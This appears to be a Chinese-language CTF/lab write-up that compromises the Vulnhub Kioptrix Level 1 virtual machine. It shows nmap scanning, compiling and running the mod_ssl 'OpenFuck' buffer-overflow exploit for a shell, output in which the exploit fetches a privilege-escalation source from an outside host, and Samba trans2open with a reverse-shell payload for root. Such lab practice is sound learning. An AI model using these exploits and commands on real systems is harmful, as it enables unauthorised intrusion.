将kioptrix1的网卡设置为net,kali也为net
靶机打开之后是这样的
无法扫描到目标机该怎么办 编辑VMX configuration file文件,把里头的bridged换成nat,但保留最后一个bridged。试一下好使不,不好使把最后一个bridged也改成nat.
确认目标ip
我们需要知道目标的ip,扫描存活主机
信息搜集
sudo nmap -sn 192.168.170.0/24
192.168.170.1是网卡的默认网关,不是我们要寻找的目标 类似的,192.168.170.2和192.168.170.254都是默认不会分配给主机的网关地址 134是kali自身ip 所以确认目标ip为 192.168.170.135 ![[Pasted image 20230328195909.png]]
接下来进行进一步的扫描
sudo nmap -sC -sV -v -p- -A 192.168.170.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-28 08:05 EDT NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 08:05 Completed NSE at 08:05, 0.00s elapsed Initiating NSE at 08:05 Completed NSE at 08:05, 0.00s elapsed Initiating NSE at 08:05 Completed NSE at 08:05, 0.00s elapsed Initiating ARP Ping Scan at 08:05 Scanning 192.168.170.135 [1 port] Completed ARP Ping Scan at 08:05, 0.06s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 08:05 Completed Parallel DNS resolution of 1 host. at 08:05, 0.01s elapsed Initiating SYN Stealth Scan at 08:05 Scanning bogon (192.168.170.135) [65535 ports] Discovered open port 80/tcp on 192.168.170.135 Discovered open port 111/tcp on 192.168.170.135 Discovered open port 139/tcp on 192.168.170.135 Discovered open port 443/tcp on 192.168.170.135 Discovered open port 22/tcp on 192.168.170.135 Discovered open port 1024/tcp on 192.168.170.135 Completed SYN Stealth Scan at 08:05, 7.03s elapsed (65535 total ports) Initiating Service scan at 08:05 Scanning 6 services on bogon (192.168.170.135) Completed Service scan at 08:05, 11.03s elapsed (6 services on 1 host) Initiating OS detection (try #1) against bogon (192.168.170.135) NSE: Script scanning 192.168.170.135. Initiating NSE at 08:05 Completed NSE at 08:05, 10.64s elapsed Initiating NSE at 08:05 Completed NSE at 08:05, 0.04s elapsed Initiating NSE at 08:05 Completed NSE at 08:05, 0.00s elapsed Nmap scan report for bogon (192.168.170.135) Host is up (0.00079s latency). Not shown: 65529 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99) | ssh-hostkey: | 1024 b8746cdbfd8be666e92a2bdf5e6f6486 (RSA1) | 1024 8f8e5b81ed21abc180e157a33c85c471 (DSA) |_ 1024 ed4ea94a0614ff1514ceda3a80dbe281 (RSA) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b | http-methods: | Supported Methods: GET HEAD OPTIONS TRACE |_ Potentially risky methods: TRACE |_http-title: Test Page for the Apache Web Server on Red Hat Linux 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 1024/tcp status |_ 100024 1 1024/udp status 139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP) 443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_ssl-date: 2023-03-28T13:07:44+00:00; +1h01m52s from scanner time. | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: md5WithRSAEncryption | Not valid before: 2009-09-26T09:32:06 | Not valid after: 2010-09-26T09:32:06 | MD5: 78ce52934723e7fec28d74ab42d702f1 |_SHA-1: 9c4291c3bed2a95b983d10acf766ecb987661d33 |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b | sslv2: | SSLv2 supported | ciphers: | SSL2_RC2_128_CBC_WITH_MD5 | SSL2_RC4_64_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 |_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | http-methods: |_ Supported Methods: GET HEAD POST |_http-title: 400 Bad Request 1024/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:95:4A:C2 (VMware) Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4 OS details: Linux 2.4.9 - 2.4.18 (likely embedded) Uptime guess: 0.007 days (since Tue Mar 28 07:56:17 2023) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=202 (Good luck!) IP ID Sequence Generation: All zeros Host script results: |_clock-skew: 1h01m51s |_smb2-time: Protocol negotiation failed (SMB2) | nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox) | Names: | KIOPTRIX<00> Flags: <unique><active> | KIOPTRIX<03> Flags: <unique><active> | KIOPTRIX<20> Flags: <unique><active> | \x01\x02__MSBROWSE__\x02<01> Flags: <group><active> | MYGROUP<00> Flags: <group><active> | MYGROUP<1d> Flags: <unique><active> |_ MYGROUP<1e> Flags: <group><active> TRACEROUTE HOP RTT ADDRESS 1 0.79 ms bogon (192.168.170.135) NSE: Script Post-scanning. Initiating NSE at 08:05 Completed NSE at 08:05, 0.00s elapsed Initiating NSE at 08:05 Completed NSE at 08:05, 0.00s elapsed Initiating NSE at 08:05 Completed NSE at 08:05, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 30.70 seconds Raw packets sent: 65572 (2.886MB) | Rcvd: 65551 (2.623MB)
发现靶机开启了80和443端口,尝试进行访问 ![[Pasted image 20230328201108.png]] 都是这个页面,没有发现更多信息 仔细观察nmap扫描出来的信息 这里的apache中间件版本为 http-server-header: Apache/1.3.20 443端口上的ssl服务版本为 mod_ssl/2.8.4 OpenSSL/0.9.6b
寻找exp
第一个方法
我们来访问一下expdb Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers (exploit-db.com) 这个网站 搜索mod_ssl
下载源码
将代码下载到本地,重命名为OpenFuck.c
下载的时候需要注意代码中的注释,他们往往会告知使用者该文件中代码的使用方式或编译方式 按照要求进行编译
gcc -o OpenFuck OpenFuck.c -lcrypto
编译失败可以使用以下命令安装一个库再进行编译
apt-get install libssl-dev
编译完成之后的样子
执行 ./OpenFuck 命令,即可获得该可执行文件的使用说明
第二个方法(参照大佬的方法)
┌──(root kali)-[~/Desktop] └─# searchsploit mod_ssl ------------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------ --------------------------------- Apache mod_ssl 2.0.x - Remote Denial of Service | linux/dos/24590.txt Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow | multiple/dos/21575.txt Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow | unix/remote/40347.txt ------------------------------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results
对比mod_ssl/2.8.4版本,有三个版本合适,挨个进行测试
经过测试发现unix/remote/47080.c是可以使用的,咱们给他复制出来
┌──(root kali)-[~/Desktop] └─# locate unix/remote/47080.c /usr/share/exploitdb/exploits/unix/remote/47080.c ┌──(root kali)-[~/Desktop] └─# cp /usr/share/exploitdb/exploits/unix/remote/47080.c ./
然后使用gcc进行编译
┌──(root kali)-[~/Desktop] └─# gcc -o exploit 47080.c -lcrypto 47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录 21 | #include <openssl/ssl.h> | ^~~~~~~~~~~~~~~ compilation terminated.
提示报错了,经过百度搜索,发现是缺少了组件
咱们使用apt进行安装
┌──(root kali)-[~/Desktop] └─# apt-get install libssl1.0-dev
然后再进行编译
┌──(root kali)-[~/Desktop]
└─# gcc -o exploit 47080.c -lcrypto
┌──(root kali)-[~/Desktop]
└─# ls
47080.c exploit
去运行一下
┌──(root kali)-[~/Desktop] └─# ./exploit ******************************************************************* * OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open * ******************************************************************* * by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE * * #hackarena irc.brasnet.org * * TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname * * #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam * * #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ * ******************************************************************* : Usage: ./exploit target box [port] [-c N] target - supported box eg: 0x00 box - hostname or IP address port - port for ssl connection -c open N connections. (use range 40-50 if u dont know)
运行后得到了运行参数,咱们还得先找到对应的版本
┌──(root kali)-[~/Desktop]
└─# ./exploit | grep apache-1.3.20 1 ⨯
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
符合条件的有两个,分别是0x6a和0x6b,分别去测试一下
┌──(root kali)-[~/Desktop] └─# ./exploit 0x6a 192.168.170.135 -c 40 ******************************************************************* * OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open * ******************************************************************* * by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE * * #hackarena irc.brasnet.org * * TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname * * #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam * * #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ * ******************************************************************* Connection... 40 of 40 Establishing SSL connection cipher: 0x4043808c ciphers: 0x80f8070 Ready to send shellcode Spawning shell... Good Bye!
0x6a测试失败,现在去测试一下0x6b
┌──(root kali)-[~/Desktop]
└─# ./exploit 0x6b 192.168.170.135 -c 40
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f81e8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--09:32:52-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
Unable to establish SSL connection.
Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$
bash-2.05$ whoami&&id
whoami&&id
apache
uid=48(apache) gid=48(apache) groups=48(apache)
0x6b成功getshell,本来应该可以直接提权到root权限的,但是因为没办法和下载提权脚本的网站建立ssl连接导致脚本没下载下来,怎样解决可以参考大佬博客 vulnhub Kioptrix: Level 1 (#1)_仙女象的博客-CSDN博客
权限提升
用smb_version这个payload探测smb版本
然后在msf中使用exploit/linux/samba/trans2open脚本
use exploit/linux/samba/trans2open set payload linux/x86/shell_reverse_tcp show options set rhosts 192.168.170.135 exploit
或者 前往expdb网站上看一看,搜索samba 2.2.x Samba < 2.2.8 (Linux/BSD) - Remote Code Execution - Multiple remote Exploit (exploit-db.com) 这个网站上找到exp 手动编译 gcc 10.c -o smb ./smb -b 0 -c kali_ip 目标ip 成功拿到root
1007
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
